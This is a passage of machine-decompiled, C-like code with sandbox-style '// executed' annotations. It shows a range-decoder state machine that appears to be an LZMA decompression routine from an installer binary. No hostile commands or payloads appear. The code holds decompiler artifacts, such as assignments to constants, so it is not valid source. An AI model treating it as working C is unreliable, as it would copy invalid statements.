                                                                      								goto L12;
                                                                      							}
                                                                      							if( *(_t613 - 4) != 0) {
                                                                      								GlobalFree( *(_t613 - 4));
                                                                      							}
                                                                      							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                      							 *(_t613 - 4) = _t535;
                                                                      							if(_t535 == 0) {
                                                                      								goto L171;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                      								goto L10;
                                                                      							}
                                                                      						case 1:
                                                                      							L13:
                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                      								 *(_t613 - 0x88) = 1;
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                      							_t45 = _t613 - 0x48;
                                                                      							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                      							__eflags =  *_t45;
                                                                      							L15:
                                                                      							if( *(_t613 - 0x48) < 4) {
                                                                      								goto L13;
                                                                      							}
                                                                      							_t547 =  *(_t613 - 0x40);
                                                                      							if(_t547 ==  *(_t613 - 0x74)) {
                                                                      								L20:
                                                                      								 *(_t613 - 0x48) = 5;
                                                                      								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                      								goto L23;
                                                                      							}
                                                                      							 *(_t613 - 0x74) = _t547;
                                                                      							if( *(_t613 - 8) != 0) {
                                                                      								GlobalFree( *(_t613 - 8));
                                                                      							}
                                                                      							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                      							 *(_t613 - 8) = _t535;
                                                                      							if(_t535 == 0) {
                                                                      								goto L171;
                                                                      							} else {
                                                                      								goto L20;
                                                                      							}
                                                                      						case 2:
                                                                      							L24:
                                                                      							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                      							 *(_t613 - 0x84) = 6;
                                                                      							 *(_t613 - 0x4c) = _t554;
                                                                      							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                      							goto L132;
                                                                      						case 3:
                                                                      							L21:
                                                                      							__eflags =  *(_t613 - 0x6c);
                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                      								 *(_t613 - 0x88) = 3;
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                      							_t67 = _t613 - 0x70;
                                                                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                      							__eflags =  *_t67;
                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                      							L23:
                                                                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                      							if( *(_t613 - 0x48) != 0) {
                                                                      								goto L21;
                                                                      							}
                                                                      							goto L24;
                                                                      						case 4:
                                                                      							goto L133;
                                                                      						case 5:
                                                                      							goto L137;
                                                                      						case 6:
                                                                      							__edx = 0;
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__eax =  *(__ebp - 4);
                                                                      								__ecx =  *(__ebp - 0x38);
                                                                      								 *(__ebp - 0x34) = 1;
                                                                      								 *(__ebp - 0x84) = 7;
                                                                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                      								goto L132;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                      							__esi =  *(__ebp - 0x60);
                                                                      							__cl = 8;
                                                                      							__cl = 8 -  *(__ebp - 0x3c);
                                                                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                      							__ecx =  *(__ebp - 0x3c);
                                                                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                      							__ecx =  *(__ebp - 4);
                                                                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                      							__eflags =  *(__ebp - 0x38) - 4;
                                                                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      							if( *(__ebp - 0x38) >= 4) {
                                                                      								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                      								if( *(__ebp - 0x38) >= 0xa) {
                                                                      									_t98 = __ebp - 0x38;
                                                                      									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                      									__eflags =  *_t98;
                                                                      								} else {
                                                                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                      								}
                                                                      							} else {
                                                                      								 *(__ebp - 0x38) = 0;
                                                                      							}
                                                                      							__eflags =  *(__ebp - 0x34) - __edx;
                                                                      							if( *(__ebp - 0x34) == __edx) {
                                                                      								__ebx = 0;
                                                                      								__ebx = 1;
                                                                      								goto L61;
                                                                      							} else {
                                                                      								__eax =  *(__ebp - 0x14);
                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                      									__eflags = __eax;
                                                                      								}
                                                                      								__ecx =  *(__ebp - 8);
                                                                      								__ebx = 0;
                                                                      								__ebx = 1;
                                                                      								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                      								goto L41;
                                                                      							}
                                                                      						case 7:
                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                      								__eax =  *(__ebp - 0x24);
                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      								__eax =  *(__ebp - 0x28);
                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      								__eax =  *(__ebp - 0x2c);
                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      								__eax = 0;
                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      								__al = __al & 0x000000fd;
                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                      								__eax =  *(__ebp - 4);
                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                      								__eflags = __eax;
                                                                      								 *(__ebp - 0x58) = __eax;
                                                                      								goto L69;
                                                                      							}
                                                                      							__eax =  *(__ebp - 4);
                                                                      							__ecx =  *(__ebp - 0x38);
                                                                      							 *(__ebp - 0x84) = 8;
                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                      							goto L132;
                                                                      						case 8:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__eax =  *(__ebp - 4);
                                                                      								__ecx =  *(__ebp - 0x38);
                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                      							} else {
                                                                      								__eax =  *(__ebp - 0x38);
                                                                      								__ecx =  *(__ebp - 4);
                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                      								 *(__ebp - 0x84) = 9;
                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                      							}
                                                                      							goto L132;
                                                                      						case 9:
                                                                      							goto L0;
                                                                      						case 0xa:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__eax =  *(__ebp - 4);
                                                                      								__ecx =  *(__ebp - 0x38);
                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                      								goto L132;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x28);
                                                                      							goto L88;
                                                                      						case 0xb:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__ecx =  *(__ebp - 0x24);
                                                                      								__eax =  *(__ebp - 0x20);
                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      							} else {
                                                                      								__eax =  *(__ebp - 0x24);
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x28);
                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      							L88:
                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      							goto L89;
                                                                      						case 0xc:
                                                                      							L99:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t334 = __ebp - 0x70;
                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t334;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							__eax =  *(__ebp - 0x2c);
                                                                      							goto L101;
                                                                      						case 0xd:
                                                                      							L37:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0xd;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t122 = __ebp - 0x70;
                                                                      							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t122;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							L39:
                                                                      							__eax =  *(__ebp - 0x40);
                                                                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                      								goto L48;
                                                                      							}
                                                                      							__eflags = __ebx - 0x100;
                                                                      							if(__ebx >= 0x100) {
                                                                      								goto L54;
                                                                      							}
                                                                      							L41:
                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                      							__ecx =  *(__ebp - 0x58);
                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                      							 *(__ebp - 0x48) = __eax;
                                                                      							__eax = __eax + 1;
                                                                      							__eax = __eax << 8;
                                                                      							__eax = __eax + __ebx;
                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      							__ax =  *__esi;
                                                                      							 *(__ebp - 0x54) = __esi;
                                                                      							__edx = __ax & 0x0000ffff;
                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      								__cx = __ax;
                                                                      								 *(__ebp - 0x40) = 1;
                                                                      								__cx = __ax >> 5;
                                                                      								__eflags = __eax;
                                                                      								__ebx = __ebx + __ebx + 1;
                                                                      								 *__esi = __ax;
                                                                      							} else {
                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                      								0x800 = 0x800 - __edx;
                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      								__ebx = __ebx + __ebx;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      								goto L39;
                                                                      							} else {
                                                                      								goto L37;
                                                                      							}
                                                                      						case 0xe:
                                                                      							L46:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0xe;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t156 = __ebp - 0x70;
                                                                      							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t156;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							while(1) {
                                                                      								L48:
                                                                      								__eflags = __ebx - 0x100;
                                                                      								if(__ebx >= 0x100) {
                                                                      									break;
                                                                      								}
                                                                      								__eax =  *(__ebp - 0x58);
                                                                      								__edx = __ebx + __ebx;
                                                                      								__ecx =  *(__ebp - 0x10);
                                                                      								__esi = __edx + __eax;
                                                                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      								__ax =  *__esi;
                                                                      								 *(__ebp - 0x54) = __esi;
                                                                      								__edi = __ax & 0x0000ffff;
                                                                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      								if( *(__ebp - 0xc) >= __ecx) {
                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      									__cx = __ax;
                                                                      									_t170 = __edx + 1; // 0x1
                                                                      									__ebx = _t170;
                                                                      									__cx = __ax >> 5;
                                                                      									__eflags = __eax;
                                                                      									 *__esi = __ax;
                                                                      								} else {
                                                                      									 *(__ebp - 0x10) = __ecx;
                                                                      									0x800 = 0x800 - __edi;
                                                                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      									__ebx = __ebx + __ebx;
                                                                      									 *__esi = __cx;
                                                                      								}
                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      									continue;
                                                                      								} else {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      							L54:
                                                                      							_t173 = __ebp - 0x34;
                                                                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                      							__eflags =  *_t173;
                                                                      							goto L55;
                                                                      						case 0xf:
                                                                      							L58:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0xf;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t203 = __ebp - 0x70;
                                                                      							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t203;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							L60:
                                                                      							__eflags = __ebx - 0x100;
                                                                      							if(__ebx >= 0x100) {
                                                                      								L55:
                                                                      								__al =  *(__ebp - 0x44);
                                                                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                      								goto L56;
                                                                      							}
                                                                      							L61:
                                                                      							__eax =  *(__ebp - 0x58);
                                                                      							__edx = __ebx + __ebx;
                                                                      							__ecx =  *(__ebp - 0x10);
                                                                      							__esi = __edx + __eax;
                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      							__ax =  *__esi;
                                                                      							 *(__ebp - 0x54) = __esi;
                                                                      							__edi = __ax & 0x0000ffff;
                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      								__cx = __ax;
                                                                      								_t217 = __edx + 1; // 0x1
                                                                      								__ebx = _t217;
                                                                      								__cx = __ax >> 5;
                                                                      								__eflags = __eax;
                                                                      								 *__esi = __ax;
                                                                      							} else {
                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                      								0x800 = 0x800 - __edi;
                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      								__ebx = __ebx + __ebx;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      								goto L60;
                                                                      							} else {
                                                                      								goto L58;
                                                                      							}
                                                                      						case 0x10:
                                                                      							L109:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t365 = __ebp - 0x70;
                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t365;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							goto L111;
                                                                      						case 0x11:
                                                                      							goto L69;
                                                                      						case 0x12:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__eax =  *(__ebp - 0x58);
                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                      								goto L132;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x4c);
                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                      							__ecx =  *(__ebp - 0x58);
                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                      							__eflags = __eax;
                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                      							goto L130;
                                                                      						case 0x13:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								_t469 = __ebp - 0x58;
                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                      								__eflags =  *_t469;
                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                      								 *(__ebp - 0x40) = 8;
                                                                      								L144:
                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                      								goto L145;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x4c);
                                                                      							__ecx =  *(__ebp - 0x58);
                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                      							 *(__ebp - 0x30) = 8;
                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                      							L130:
                                                                      							 *(__ebp - 0x58) = __eax;
                                                                      							 *(__ebp - 0x40) = 3;
                                                                      							goto L144;
                                                                      						case 0x14:
                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                      							__eax =  *(__ebp - 0x80);
                                                                      							goto L140;
                                                                      						case 0x15:
                                                                      							__eax = 0;
                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      							__al = __al & 0x000000fd;
                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                      							goto L120;
                                                                      						case 0x16:
                                                                      							__eax =  *(__ebp - 0x30);
                                                                      							__eflags = __eax - 4;
                                                                      							if(__eax >= 4) {
                                                                      								_push(3);
                                                                      								_pop(__eax);
                                                                      							}
                                                                      							__ecx =  *(__ebp - 4);
                                                                      							 *(__ebp - 0x40) = 6;
                                                                      							__eax = __eax << 7;
                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                      							 *(__ebp - 0x58) = __eax;
                                                                      							goto L145;
                                                                      						case 0x17:
                                                                      							L145:
                                                                      							__eax =  *(__ebp - 0x40);
                                                                      							 *(__ebp - 0x50) = 1;
                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                      							goto L149;
                                                                      						case 0x18:
                                                                      							L146:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t484 = __ebp - 0x70;
                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t484;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							L148:
                                                                      							_t487 = __ebp - 0x48;
                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                      							__eflags =  *_t487;
                                                                      							L149:
                                                                      							__eflags =  *(__ebp - 0x48);
                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                      								__ecx =  *(__ebp - 0x40);
                                                                      								__ebx =  *(__ebp - 0x50);
                                                                      								0 = 1;
                                                                      								__eax = 1 << __cl;
                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                      								__eax =  *(__ebp - 0x7c);
                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                      								goto L140;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x50);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      							__eax =  *(__ebp - 0x58);
                                                                      							__esi = __edx + __eax;
                                                                      							 *(__ebp - 0x54) = __esi;
                                                                      							__ax =  *__esi;
                                                                      							__edi = __ax & 0x0000ffff;
                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      								__cx = __ax;
                                                                      								__cx = __ax >> 5;
                                                                      								__eax = __eax - __ecx;
                                                                      								__edx = __edx + 1;
                                                                      								__eflags = __edx;
                                                                      								 *__esi = __ax;
                                                                      								 *(__ebp - 0x50) = __edx;
                                                                      							} else {
                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                      								0x800 = 0x800 - __edi;
                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      								goto L148;
                                                                      							} else {
                                                                      								goto L146;
                                                                      							}
                                                                      						case 0x19:
                                                                      							__eflags = __ebx - 4;
                                                                      							if(__ebx < 4) {
                                                                      								 *(__ebp - 0x2c) = __ebx;
                                                                      								L119:
                                                                      								_t393 = __ebp - 0x2c;
                                                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                      								__eflags =  *_t393;
                                                                      								L120:
                                                                      								__eax =  *(__ebp - 0x2c);
                                                                      								__eflags = __eax;
                                                                      								if(__eax == 0) {
                                                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                      									goto L170;
                                                                      								}
                                                                      								__eflags = __eax -  *(__ebp - 0x60);
                                                                      								if(__eax >  *(__ebp - 0x60)) {
                                                                      									goto L171;
                                                                      								}
                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                      								__eax =  *(__ebp - 0x30);
                                                                      								_t400 = __ebp - 0x60;
                                                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                      								__eflags =  *_t400;
                                                                      								goto L123;
                                                                      							}
                                                                      							__ecx = __ebx;
                                                                      							__eax = __ebx;
                                                                      							__ecx = __ebx >> 1;
                                                                      							__eax = __ebx & 0x00000001;
                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                      							__al = __al | 0x00000002;
                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                      							__eflags = __ebx - 0xe;
                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                      							if(__ebx >= 0xe) {
                                                                      								__ebx = 0;
                                                                      								 *(__ebp - 0x48) = __ecx;
                                                                      								L102:
                                                                      								__eflags =  *(__ebp - 0x48);
                                                                      								if( *(__ebp - 0x48) <= 0) {
                                                                      									__eax = __eax + __ebx;
                                                                      									 *(__ebp - 0x40) = 4;
                                                                      									 *(__ebp - 0x2c) = __eax;
                                                                      									__eax =  *(__ebp - 4);
                                                                      									__eax =  *(__ebp - 4) + 0x644;
                                                                      									__eflags = __eax;
                                                                      									L108:
                                                                      									__ebx = 0;
